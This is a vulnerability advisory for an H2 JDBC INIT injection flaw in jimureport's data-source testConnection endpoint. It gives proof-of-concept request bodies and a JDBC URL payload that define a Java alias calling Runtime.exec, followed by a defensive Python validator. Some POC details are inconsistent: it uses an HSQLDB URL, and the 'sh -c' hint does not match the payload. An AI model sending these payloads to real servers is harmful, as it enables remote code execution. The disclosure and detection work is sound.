### Vulnerability Overview

The `/drag/onDragDatasource/testConnection` endpoint in the jimureport BI Dashboard data source management module contains a Remote Code Execution (RCE) vulnerability. The endpoint opens a connection with the user-supplied JDBC URL without validating dangerous H2 connection settings. H2 runs the SQL given in the `INIT` parameter of a JDBC URL while the connection is being established, and `CREATE ALIAS` accepts a Java method body, so an attacker who controls the URL can define and execute arbitrary Java code on the server during the connection test. The previous fix for DB2 injection did not address this H2 JDBC injection issue.

### Affected Versions

≤ v2.3.0

### Remediation

This vulnerability has been fixed in subsequent versions (the issue status is Closed; user jeecg commented "Modified, will be updated in the next version"). Users are advised to upgrade to the patched version.

### POC Code

```json
{
  "name": "test",
  "type": "HsqlDB",
  "driver": "org.hsqldb.jdbc.JDBCDriver;INIT=CREATE ALIAS IF NOT EXISTS EXEC AS 'void exec(String c) throws Exception { Runtime.getRuntime().exec(c); }';",
  "url": "jdbc:hsqldb:hsql://127.0.0.1/jimureport",
  "username": "aaa",
  "password": "..."
}
```

Note that the request body as posted places the `INIT` clause in the `driver` field and points the `url` at an HSQLDB server; the H2 JDBC URL form described in the overview is the payload below.

Linux payload (replace `cmd` with `sh -c`):

```
jdbc:h2:mem:exploit_db;INIT=CREATE ALIAS IF NOT EXISTS EXEC AS 'void exec(String c) throws Exception { Runtime.getRuntime().exec(c); }';
```
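The check the endpoint is missing, written here as an added example rather than jimureport's own code: parse the `url` and `driver` fields of a `testConnection` request body and reject anything that would let H2 evaluate `INIT` at connect time. The request bodies, the finding strings and the `check_datasource` / `h2_settings` helper names are constructed for this example and are not part of the project.

```python
"""Added example (not jimureport's code): reject data-source definitions whose
JDBC URL or driver field would let H2's INIT setting run SQL at connect time."""
import re
from urllib.parse import unquote

# H2 connection-URL settings that execute SQL while the connection is opened.
# INIT is the one the advisory describes; the set is easy to extend.
DANGEROUS_H2_SETTINGS = {"INIT"}

# A JDBC driver field must be a bare Java class name and nothing else, so a
# value such as "org.hsqldb.jdbc.JDBCDriver;INIT=..." never reaches the driver.
JAVA_CLASS_NAME = re.compile(r"[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*")

# H2 treats "\;" as an escaped semicolon inside a setting value; split only on
# the unescaped ones so the setting keys come out intact.
UNESCAPED_SEMICOLON = re.compile(r"(?<!\\);")


def h2_settings(url: str) -> dict:
    """Return the ;KEY=VALUE settings of an H2 JDBC URL with upper-cased keys.

    The URL is percent-decoded first so an encoded separator (%3B) is not
    missed. Values are kept verbatim; only the keys matter for the check,
    which also keeps a Java body containing ';' from confusing the parser.
    """
    decoded = unquote(url).strip()
    parts = UNESCAPED_SEMICOLON.split(decoded)
    settings = {}
    for part in parts[1:]:  # parts[0] is "jdbc:h2:<database>"
        key, _, value = part.partition("=")
        settings[key.strip().upper()] = value
    return settings


def check_datasource(body: dict) -> list:
    """Return the findings for a testConnection request body.

    An empty list means the definition passed every check and may be handed
    to the JDBC driver.
    """
    findings = []
    driver = str(body.get("driver", ""))
    url = str(body.get("url", ""))

    if not JAVA_CLASS_NAME.fullmatch(driver):
        findings.append(f"driver is not a bare class name: {driver!r}")

    decoded = unquote(url).strip()
    if decoded.lower().startswith("jdbc:h2:"):
        for key in h2_settings(decoded):
            if key in DANGEROUS_H2_SETTINGS:
                findings.append(f"H2 URL carries the {key} setting")
    return findings


# Constructed request bodies for the demonstration (not captured traffic).
POC_REQUEST = {  # the advisory's H2 payload placed in the url field
    "name": "test",
    "type": "H2",
    "driver": "org.h2.Driver",
    "url": "jdbc:h2:mem:exploit_db;INIT=CREATE ALIAS IF NOT EXISTS EXEC AS "
           "'void exec(String c) throws Exception { Runtime.getRuntime().exec(c); }'",
    "username": "sa",
    "password": "",
}
SMUGGLED_DRIVER_REQUEST = {  # the advisory's JSON body: INIT hidden in driver
    "name": "test",
    "type": "HsqlDB",
    "driver": "org.hsqldb.jdbc.JDBCDriver;INIT=CREATE ALIAS IF NOT EXISTS EXEC AS "
              "'void exec(String c) throws Exception { Runtime.getRuntime().exec(c); }';",
    "url": "jdbc:hsqldb:hsql://127.0.0.1/jimureport",
    "username": "aaa",
    "password": "...",
}
BENIGN_REQUEST = {  # an ordinary in-memory H2 source with a harmless setting
    "name": "reports",
    "type": "H2",
    "driver": "org.h2.Driver",
    "url": "jdbc:h2:mem:reports;DB_CLOSE_DELAY=-1",
    "username": "sa",
    "password": "",
}


if __name__ == "__main__":
    for label, body in (("poc", POC_REQUEST),
                        ("smuggled-driver", SMUGGLED_DRIVER_REQUEST),
                        ("benign", BENIGN_REQUEST)):
        print(label, check_datasource(body) or "ok")
```

The check works on keys only and decodes the URL before splitting, so `init=`, `%3BINIT%3D` and a `CREATE ALIAS` body that itself contains semicolons are all caught; a server-side fix in jimureport would apply the same rule before the URL is passed to `DriverManager`.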